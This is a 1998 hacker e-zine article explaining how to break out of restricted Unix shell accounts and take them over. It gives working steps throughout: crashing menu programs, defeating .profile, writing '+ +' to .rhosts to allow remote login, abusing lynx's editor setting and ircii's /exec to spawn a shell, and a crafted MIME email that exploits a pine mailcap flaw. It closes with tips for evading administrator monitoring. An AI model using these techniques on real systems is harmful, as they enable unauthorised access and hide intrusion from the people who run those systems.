888 88888888888888
888 88 88
888 88 .d8888b 88 .d8888b
88888b. 88 d88P" 88 88K
888 "88b 88 888 88 "Y8888b.
888 888 88 Y88b. 88 X88
888 d88P 88 "Y8888P 88 88888P'
88888P" 88 88
88888888888888
.Official Brain Candy Release.
.:[ Tricks and Tips on Taking Over of a Restricted Shell Account ]:.
by headflux (headflux@hempseed.com) 6/11/98
Shoutouts to Brain Candy - http://www.cybershocks.com/bc
There are several methods of how to break out of a restricted shell, but
first you have to know what a restricted shell is. On a normal login into
a unix system, after you enter your username and password it will
automatically run the shell described in /etc/passwd. What kind of prompt
you get depends on what shell you are running. There is usually a list of
available shells found in /etc/shells.
A restricted shell is a program that replaces a normal shell and only
allows you to run programs that the admin deems appropriate. In most
restricted shells, instead of getting a prompt, you would get a menu.
Here's an example:
----------------------------------------------------------------
Welcome to lame.site.com running Linux 2.0.34!
lame login: guest
Password:
Last login: Sun May 17 06:09:06 on ttyp2.
No mail.
lame.site.com guest menu
(lynx) - Browse the web using lynx
(pine) - Check your mail using pine
(irc) - Irc chat using ircii
(telnet) - Telnet to another site
(exit) - Log you out
Command:
----------------------------------------------------------------
Once your on the system you want to make sure that you accually are on a
restricted shell and not just on a regular shell running a menu program.
To do this press CTRL^C, CTRL^D, or CTRL^Z. Doing this will terminate the
menu program. If it accually is a restricted shell it will most likely log
you out of the system and you'll have to log back in again. But, if it is
just a menu program it should drop to a normal shell. Assuming that your
running a bash shell, you should get something like this:
lame:~$
You may also try typing in invalid input to get the menu program to crash.
An example of this would be typing in a long row of characters or symbols.
or typing in commands but with long invalid arguments.
If you do get a prompt and are not logged out, then you are pretty much
your home free. Let me explain how this works. When you first login into a
system running bash, it searches for a file in you home directory called
.bash_login. If it can't read .bash_login or it does not exist then it
looks for a file called .profile. These files usually contain a list of
commands which are automatically run when you log in. So while your real
shell might be /bin/bash, .profile might tell bash to run /bin/restricted.
When you get the menu program to crash it drops you back into /bin/bash.
The shell runs the menu, and the "user" interacts with the menu.
(shell) --> menu <-- [user]
But when the "user" gets the menu to crash, the "user" gets dropped back
to the shell so he can now interact directly with the shell.
(shell) <-- [user]
Now let's change a few things around so you don't how to go through this
everytime. first run the "ls -la" command to get a full listing of your
home directory. You should get something like this:
----------------------------------------------------------------
lame:~$ ls -la
total 89
drwx------ 3 guest users 1024 May 17 11:14 ./
drwxr-xr-x 6 root root 1024 May 17 06:08 ../
-rw-r--r-- 1 guest users 512 May 18 08:58 .bash_history
-rw-r--r-- 1 guest users 14 May 17 06:08 .profile
-rw-r--r-- 1 guest users 34 May 17 06:08 .less
-rw-r--r-- 1 guest users 114 May 17 06:08 .lessrc
----------------------------------------------------------------
to see what .profile contains type:
----------------------------------------------------------------
lame:~$ cat .profile
/bin/restricted
----------------------------------------------------------------
Now, under normal circumstances, you should be able to just delete
.profile by typing "rm .profile" and you would have successfully changed
the restricted shell to an unrestricted shell, but the admin might be
smart enough to protect against that. If you do get a permission denied
error, then create a file called .bash_login using the following command:
lame:~$ echo > .bash_login
As i said earlier, when you log on using bash it searches for a file
called .bash_login and if .bash_login doesn't exist it searches and runs
.profile and it will only run one of these files. Normally it will look
for .bash_login first. And by creating a file called .bash_login with
nothing in it, makes .profile useless.
You can tell what shell your using by using the command:
----------------------------------------------------------------
lame:~$ cat /etc/passwd | grep guest
guest:x:405:100:guest:/home/guest:/bin/bash
----------------------------------------------------------------
If you are not familiar with the unix passwd file format then this should
explain a little:
Username: guest
Shadowed Password: x
User id: 405
Group id: 100
Real Name: guest
Home Directory: /home/guest
Shell: /bin/bash
On most restricted shells it will not be set up this way, and instead of
you running /bin/bash and /bin/bash running a menu program, it runs the
menu program from the beginning. Thus you would want to somehow get the
menu to run a shell. But the whole reason of having a restricted shell in
the first place is so that the user cannot run programs that the admin
doesn't want you to, the program the admin doesn't want you to run being
the shell. Therefore we have to make one of the programs that you are
allowed to run, run the a shell.
(menu) --> allowed program --> restricted program: shell <-- [user]
Let's take a look again at the programs you have access to:
(lynx) - Browse the web using lynx
(pine) - Check your mail using pine
(irc) - Irc chat using ircii
(telnet) - Telnet to another site
There is nothing you can really do with telnet, so let's rule that one
out. You end up with lynx, pine, and ircii. These are all popular, (also
vulnerable) programs that should be available from restricted shells on
most systems.
You don't always have to get the program to run a shell. If you are able
to create a file in your home directory called .rhosts containing "+ +"
then you may be able to login through rshd (the remote login daemon). But,
just because you have a .rhosts file doesn't always mean you can remotely
login. It also depends on how rshd and inetd are configured. Normally
there is a file /etc/hosts.equiv which contains a list of hosts that
considered "equivalent" or trusted enough to be allowed access to remotely
log on. Whether or not the system your on uses /etc/hosts.equiv or even
runs rshd depends on the system.
To create a .rhosts file from a standard shell use:
lame:~$ echo + + > ~/.rhosts
Usually you should be able to create a .rhosts file in ircii using the
following command:
/exec echo + + > ~/.rhosts
You can easily see how a system is set up by looking its configuration
files in the /etc directory. If your in a restricted shell, you can still
do this by starting up lynx. For those of you who do not know what lynx
is, it's a text-based www browser. Once its running, press "g" for goto.
Then type in "/etc" and press enter and you should get a directory listing
of /etc.
This is also possible in ircii using the command:
/exec cd /etc; ls -la
/exec cat /etc/"file"
You might also want to check out your home directory to see what's in
there.
Note: In lynx, .bash_login, .profile, and any other files with "." at the
beginning will not show up unless you go into options and enable tp show
files that begin with a ".".
Now, the easiest way to get a normal shell from a restricted shell is to
use the folling method. If you don't already have lynx running then go
ahead and start it up. Once its open, press "o" for a list of options. You
should get a screen that looks something like this:
----------------------------------------------------------------
Options Menu (Lynx Version 2.6)
E)ditor : NONE
D)ISPLAY variable : NONE
B)ookmark file : lynx_bookmarks.html
F)TP sort criteria : By Filename
P)ersonal mail address : NONE
S)earching type : CASE INSENSITIVE
display (C)haracter set : ISO Latin 1
Raw 8-bit or CJK m(O)de : ON
preferred document lan(G)uage: en
preferred document c(H)arset : NONE
V)I keys : OFF
e(M)acs keys : OFF
K)eypad mode : Numbers act as arrows
li(N)e edit style : Default Binding
l(I)st directory style : Mixed style
sho(W) dot files : OFF
U)ser mode : Novice
user (A)gent : Lynx/2.6 libwww-FM/2.14
Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
Command:
----------------------------------------------------------------
Press "e" to select editor, and type in "exec" then press enter. You
should get a "value accepted" message at the bottom of your screen. After
that press "r" to return to lynx. Now hit the "g" key. You should get a
message that says "URL to open:". Type in "/bin/bash" or any other shell
you want to run and then press enter. It should display the binary for
/bin/bash on the local system. If it doesn't, try typing in the pathname
of different shell. You should get a screen similiar to this:
----------------------------------------------------------------
(p1 of 117)
ELFþ4X|4 (444
OOOUNUNàNàþàþ%þhshh/lib/ld-linux.so.1a~Ri)@ABrt<4k{o&FzHQ}]l9ahJ
bdeyj^
vqsg#-p6[:KYPIZw*mD7CWcUxnu`|_T!.>OS%(G ;'?0 "2=+1N/
M\VfEL,5$3X88X"xC&hñÿ/øY5g<8lNE"U3^àþhn"tzØ&èÅ"EáA
4§°ñÿ½ØA(gÉh<Ñ,"àè(`ñH"ûh"7J
"#),"1E*":ØuGètPøZü `"h("tH"{X"h~
I x""" ""§,"±ØC",è
ÄøtIH"O("U8XaHXêúX"h"xH&"""","*EF6Ø4BèþJø"Tàþ
\"a(jj8lpH"vXjh"x4"¥""ª,eþE!»ø"A"
I(O8"xH*YXPæh"þx;÷"ü" "Ü,IØ&"$è")ø"1";B(ªJ8~SH"WX"`hix"ud<]
"",XE>¡è>¬ø²ò»"
A8"ÉH"IXeOxgßï"ú""&
ü,ñÿøñÿøñÿ+°æñÿlibtermcap.so.2strcpyioctltgetnum_DYNAMICtgotogetenv__strtol_int
ernalmalloctgetflag__environ_initwritetputsstrncmpstrncpyrealloctgetent_finiate
xit_GLOBAL_OFFSET_TABLE_exitstrchrtgetstrfreelibc.so.5longjmpsetgrentgetrlimitg
etgid__strtod_internalcfgetospeedstrerrorgeteuidsigpause__bsd_signalgetgrgid__c
type_berrnogetegidsetprioritygetpidqsortexeclglobcreatreadlinkdup2getuidrewindd
irisattycfgetispeedendpwentsleepreaddir_lxstat_xstat__ctype_toupperlseeksetpgid
abort__setjmpalarmpipegetpgrp__libc_initcfsetispeedstrrchrsetrlimitenvironkills
etpwentctimechdirendgrent__fpu_controlwait3cfsetospeedumaskreadgetspnamstrcollu
nlinkgetrusagecryptforkexecvgetgrentsigactionkillpgsbrkgettimeofdaylocaltimemem
settcgetattrtimeopendirgetgroupsstrcmpttynamegetpwuiddupsigblockgetpwnamgethost
-- press space for next page --
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history
----------------------------------------------------------------
Hit the "e" key to edit /bin/bash and instead of editting it, it executes
it. And now at the bottom of your screen you should have a "$" bash
prompt. Type "clear" to clear the screen and start typing away. When you
type "exit" it'll return you back to lynx. This happens because lynx,
under normal operations would run: "'editor' 'file'" But there is a small
coding flaw, so that when you change the editor to "exec" and the file to
a program, it runs "exec" instead of the normal editor and executes the
file, which in this case is a program. This is a classic problem in a lot
of programs.
There are also several other ways to get lynx to run commands/create
files. A problem in lynx protocol handling routines allows you to execute
simple commands. The only problem is that you have to have access to a
web server and easily be able to upload html files.
First create a html file containing the following and upload to a web
server. Try to get the href all on one line:
----------------------------------------------------------------
links
----------------------------------------------------------------
This link translates into echo "+ +" > .rhosts, which will create a file
.rhosts containing + + and allow you to remotely login. Whether this works
or not depends on what version of lynx your running. You might also want
to try running different commands. Just convert the letters to hexidecimal
and add a "%" in front.
There is another major flaw in lynx. Whether or not its viewed as a flaw
depends on what viewpoint your looking at it from. Lynx allows you to
download files into your home directory. If the restricted shell your
running is in your home directory and you have write access to it, then
you can easily replace it with another shell.
Run lynx, open up /bin, highlight "bash" (or which ever shell you want to
use), and press "d" for download. Select save to disk and when it asks you
what filename you want to give it, type in the name of the restricted
shell. When it asks you whether or not to rewrite it, press "y." Before
you can run your new shell, you have to give yourself permission to
execute it. Otherwise when you try logging in again you will get a
permissioned denied error. The only problem is that by the time you get
all this done, the shell will have:
1. Crashed because it has been replaced by another program.
2. The restricted shell will be copied back over the downloaded shell
Therefore, you need to download the new shell (/bin/bash) into your
directory, save it as a different name, give yourself permission to run
it, then move it overtop the existing restricted shell.
Using lynx this can be done by using the following links:
----------------------------------------------------------------
link 1
link 2
----------------------------------------------------------------
Again, try to get the href's all on one line. Or an easier way would be to
use ircii:
/exec chmod 755 "shell"
/exec cp "shell" "restricted shell"
If there are any files in your home directory that you want to write over
but don't have write permissions to them, there is a bug in certain
versions of pine which will allow you to do so. Just send a letter to the
guest account. Attach whatever file you want to replace the file with and
when you receive it with the guest account save it over the old file.
You can also execute commands from pine using taking advantage of a
vulnerablity in mailcap. Send yourself the following email replacing the
commands with the ones you want to use:
----------------------------------------------------------------
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0007_01BD5F09.B6797740"
------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ rm\ \~/.profile"
Content-Transfer-Encoding: quoted-printable
test
------=_NextPart_000_0007_01BD5F09.B6797740--
----------------------------------------------------------------
Once your logged in under a normal shell, there are a couple precautions
you should take to avoid having the admin notice what your doing. First,
whenever you log in, use the "w"/"who" command to see if root is logged
on:
----------------------------------------------------------------
lame:~$ w
2:43pm up 3:43, 2 users, load average: 1.14, 1.11, 1.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
headflux tty1 11:00am 1.00s 3:33 3:32 w
root tty2 2:43pm 8.00s 0.42s 0.42s -bash
----------------------------------------------------------------
Second, make sure the admin isn't using a tty hijacking program to
watch over what you are doing. You can do this by:
----------------------------------------------------------------
lame:~$ cd /etc; cat inetd.conf | grep telnet
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -L /bin/ttysnoops
----------------------------------------------------------------
If ttysnoops comes up then beware. The admin can see what your doing even
if he's not even logged in. That concludes this article, more to come
soon.
- headflux (headflux@hempseed.com)
EOF